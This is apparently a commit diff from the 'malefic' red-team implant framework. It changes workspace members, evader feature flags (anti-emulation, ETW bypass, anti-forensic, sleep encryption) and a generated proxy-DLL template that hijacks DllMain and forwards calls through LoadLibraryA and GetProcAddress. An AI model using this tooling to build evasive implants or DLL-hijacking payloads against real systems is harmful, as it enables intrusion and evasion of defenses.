chainreactors
diff --git a/‎Cargo.lock‎
Lines changed: 52 additions & 10 deletions b/‎Cargo.lock‎
Lines changed: 52 additions & 10 deletions
diff --git a/‎Cargo.toml‎
Lines changed: 2 additions & 2 deletions b/‎Cargo.toml‎
Lines changed: 2 additions & 2 deletions
diff --git a/‎malefic-crates/evader/Cargo.toml‎
Lines changed: 9 additions & 9 deletions b/‎malefic-crates/evader/Cargo.toml‎
Lines changed: 9 additions & 9 deletions
diff --git a/‎malefic-mutant/src/build/payload/mod.rs‎
Lines changed: 8 additions & 0 deletions b/‎malefic-mutant/src/build/payload/mod.rs‎
Lines changed: 8 additions & 0 deletions
diff --git a/‎malefic-mutant/src/tool/loader/template.rs‎
Lines changed: 6 additions & 11 deletions b/‎malefic-mutant/src/tool/loader/template.rs‎
Lines changed: 6 additions & 11 deletions
diff --git a/‎malefic-mutant/src/tool/proxydll/generator.rs‎
Lines changed: 26 additions & 11 deletions b/‎malefic-mutant/src/tool/proxydll/generator.rs‎
Lines changed: 26 additions & 11 deletions
diff --git a/‎malefic-mutant/src/tool/proxydll/mod.rs‎
Lines changed: 17 additions & 15 deletions b/‎malefic-mutant/src/tool/proxydll/mod.rs‎
Lines changed: 17 additions & 15 deletions
diff --git a/‎malefic-proxydll/Cargo.toml‎
Lines changed: 3 additions & 5 deletions b/‎malefic-proxydll/Cargo.toml‎
Lines changed: 3 additions & 5 deletions
@@ -8,6 +8,8 @@ members = [
     # malefic-macro lives in malefic-crates/macro
     "malefic-mutant",
     "malefic-prelude",
+    "malefic-proxydll",
+    "malefic-starship",
 
     "malefic-pulse",
     "malefic-3rd",
@@ -40,8 +42,6 @@ members = [
 ]
 
 exclude = [
-    "malefic-proxydll",
-    "malefic-starship",
     "lib/rage",
 ]
 
 
@@ -8,14 +8,14 @@ default = []
 debug = []
 
 # Evader modules (from starship)
-evader_anti_emu      = []
-evader_etw_pass      = []
-evader_god_speed     = []
-evader_sleep_encrypt = []
-evader_anti_forensic = []
-evader_cfg_patch     = []
-evader_api_untangle  = []
-evader_normal_api    = []
+evader_anti_emu      = ["malefic-os-win/prebuild"]
+evader_etw_pass      = ["malefic-os-win/prebuild"]
+evader_god_speed     = ["malefic-os-win/prebuild"]
+evader_sleep_encrypt = ["malefic-os-win/prebuild"]
+evader_anti_forensic = ["malefic-os-win/prebuild"]
+evader_cfg_patch     = ["malefic-os-win/prebuild"]
+evader_api_untangle  = ["malefic-os-win/prebuild"]
+evader_normal_api    = ["malefic-os-win/prebuild"]
 evader_full = [
     "evader_anti_emu",
     "evader_etw_pass",
@@ -28,7 +28,7 @@ evader_full = [
 ]
 
 # Anti-analysis modules (from win/anti)
-anti_sandbox = ["malefic-os-win/reg"]
+anti_sandbox = ["malefic-os-win/reg", "malefic-os-win/prebuild"]
 anti_vm = []
 
 # Obfuscation (community: no-op)
 
@@ -203,6 +203,14 @@ pub fn build_payload(
             .unwrap_or(0)
     );
 
+    if matches!(payload_type, PayloadType::PROXYDLL) {
+        log_step!("Processing ProxyDLL resources...");
+        if let Err(e) = crate::tool::proxydll::process_proxydll_resources(&binary_path, target) {
+            log_error!("Failed to process ProxyDLL resources: {}", e);
+            return Err(e);
+        }
+    }
+
     Ok(())
 }
 
 
@@ -8,10 +8,7 @@ use std::process::Command;
 use crate::config::EvaderConfig;
 
 /// All available loader template names (Community Edition)
-pub const LOADER_NAMES: &[&str] = &[
-    "basic_template",
-    "func_ptr",
-];
+pub const LOADER_NAMES: &[&str] = &["basic_template", "func_ptr"];
 
 /// Encoding type to feature name mapping
 pub const ENCODING_FEATURES: &[(&str, &str)] = &[
@@ -193,10 +190,10 @@ impl TemplateLoader {
         let features_str = features.join(",");
 
         let mut cmd = Command::new("cargo");
-        cmd.arg("+nightly-2023-09-18")
+        cmd.arg("+nightly-2024-02-03")
             .arg("build")
-            .arg("--manifest-path")
-            .arg("malefic-starship/Cargo.toml")
+            .arg("-p")
+            .arg("malefic-starship")
             .arg("--target")
             .arg(target)
             .arg("--features")
@@ -217,10 +214,8 @@ impl TemplateLoader {
         } else {
             ""
         };
-        let binary_path = std::path::PathBuf::from(format!(
-            "malefic-starship/target/{}/{}/starship{}",
-            target, profile, ext
-        ));
+        let binary_path =
+            std::path::PathBuf::from(format!("target/{}/{}/starship{}", target, profile, ext));
 
         Ok(binary_path)
     }
 
@@ -85,7 +85,7 @@ pub fn update_proxydll(
     log_info!("  malefic-autorun: {}", use_prelude);
 
     log_step!("Next Steps:");
-    log_info!("  Build: cargo build --release -p malefic-proxydll");
+    log_info!("  Build: ./target/release/malefic-mutant build proxy-dll --target x86_64-pc-windows-gnu");
     log_info!("  (Features are pre-configured in Cargo.toml)");
 
     Ok(())
@@ -133,8 +133,17 @@ fn build_lib(
 mod payload;
 
 use lazy_static::lazy_static;
+use std::ffi::CString;
 use std::sync::{{Arc, Mutex}};
-use malefic_os_win::kit::apis::{{m_load_library_a, m_get_func_addr_with_module_base}};
+
+#[link(name = "kernel32")]
+extern "system" {{
+    fn LoadLibraryA(lp_lib_file_name: *const u8) -> *mut core::ffi::c_void;
+    fn GetProcAddress(
+        h_module: *mut core::ffi::c_void,
+        lp_proc_name: *const u8,
+    ) -> *mut core::ffi::c_void;
+}}
 
 const DLL_NAME: &str = r"{}";
 static mut ADDRESS: usize = 0;
@@ -185,20 +194,20 @@ pub fn gateway(
         return 0;
     }}
 
-    // Convert DLL name to null-terminated C string
-    let dll_name_cstr = format!("{{}}\\0", DLL_NAME);
-    let dll_address = unsafe {{ m_load_library_a(dll_name_cstr.as_ptr()) }};
+    let dll_name_cstr = match CString::new(DLL_NAME) {{
+        Ok(value) => value,
+        Err(_) => return 0,
+    }};
+    let dll_address = unsafe {{ LoadLibraryA(dll_name_cstr.as_ptr() as *const u8) }};
     if dll_address.is_null() {{
         return 0;
     }}
 
-    // Get function address using module base
-    let func_address = unsafe {{
-        m_get_func_addr_with_module_base(
-            dll_address as *const core::ffi::c_void,
-            func_name.as_bytes()
-        )
+    let func_name_cstr = match CString::new(func_name) {{
+        Ok(value) => value,
+        Err(_) => return 0,
     }};
+    let func_address = unsafe {{ GetProcAddress(dll_address, func_name_cstr.as_ptr() as *const u8) }};
 
     if func_address.is_null() {{
         return 0;
@@ -223,6 +232,12 @@ pub fn gateway(
 
 
 use windows::Win32::Foundation::HINSTANCE;
+
+const DLL_PROCESS_DETACH: u32 = 0;
+const DLL_PROCESS_ATTACH: u32 = 1;
+const DLL_THREAD_ATTACH: u32 = 2;
+const DLL_THREAD_DETACH: u32 = 3;
+
 // Will hijack dll_main
 #[no_mangle]
 #[allow(non_snake_case)]
 
@@ -23,13 +23,22 @@ pub fn process_proxydll_resources(binary_path: &str, _target: &str) -> anyhow::R
             if proxydll_config.pack_resources {
                 log_step!("Processing and packing ProxyDLL resources...");
 
-                let proxy_dll_name = proxydll_config.proxy_dll.clone().unwrap_or_else(|| {
-                    Path::new(binary_path)
-                        .file_name()
-                        .and_then(|n| n.to_str())
-                        .unwrap_or("unknown.dll")
-                        .to_string()
-                });
+                let binary_file_name = Path::new(binary_path)
+                    .file_name()
+                    .and_then(|n| n.to_str())
+                    .unwrap_or("unknown.dll")
+                    .to_string();
+                let proxy_dll_name = proxydll_config
+                    .proxy_dll
+                    .as_deref()
+                    .filter(|name| !name.trim().is_empty())
+                    .unwrap_or(&binary_file_name)
+                    .to_string();
+                let proxied_dll_name = if proxydll_config.proxied_dll.trim().is_empty() {
+                    proxy_dll_name.clone()
+                } else {
+                    proxydll_config.proxied_dll.clone()
+                };
                 let packer = ProxyDllPacker::new(
                     &proxydll_config.resource_dir,
                     Path::new(binary_path)
@@ -38,7 +47,7 @@ pub fn process_proxydll_resources(binary_path: &str, _target: &str) -> anyhow::R
                         .to_str()
                         .unwrap(),
                     &proxy_dll_name,
-                    &proxydll_config.proxied_dll,
+                    &proxied_dll_name,
                 );
 
                 // Create output directory
@@ -88,13 +97,6 @@ pub fn process_proxydll_resources(binary_path: &str, _target: &str) -> anyhow::R
                 }
 
                 // Copy generated DLL to output directory with correct name
-                let proxy_dll_name = proxydll_config.proxy_dll.clone().unwrap_or_else(|| {
-                    Path::new(binary_path)
-                        .file_name()
-                        .and_then(|n| n.to_str())
-                        .unwrap_or("unknown.dll")
-                        .to_string()
-                });
                 let dll_dest = output_dir.join(&proxy_dll_name);
                 std::fs::copy(binary_path, &dll_dest)?;
                 log_step!(
 
@@ -9,17 +9,15 @@ proxy = []
 block = []
 native_thread = []
 
-
 [lib]
 crate-type = ["cdylib"]
 
 [dependencies]
-lazy_static = { version = "1.5.0", features = ["spin_no_std"] }
-malefic-os-win = { path = "../malefic-crates/win" }
-malefic-autorun = { path = "../malefic-crates/autorun", optional = true}
+lazy_static = "1.5.0"
+malefic-autorun = { workspace = true, optional = true }
 
 [dependencies.windows]
-version = "0.51"
+workspace = true
 features = [
     "Win32_Foundation",
     "Win32_UI_WindowsAndMessaging"
Original file line number	Diff line number	Diff line change
`@@ -8,6 +8,8 @@ members = [`
`8`	`8`	`# malefic-macro lives in malefic-crates/macro`
`9`	`9`	`"malefic-mutant",`
`10`	`10`	`"malefic-prelude",`
	`11`	`+ "malefic-proxydll",`
	`12`	`+ "malefic-starship",`
`11`	`13`
`12`	`14`	`"malefic-pulse",`
`13`	`15`	`"malefic-3rd",`
`@@ -40,8 +42,6 @@ members = [`
`40`	`42`	`]`
`41`	`43`
`42`	`44`	`exclude = [`
`43`		`- "malefic-proxydll",`
`44`		`- "malefic-starship",`
`45`	`45`	`"lib/rage",`
`46`	`46`	`]`
`47`	`47`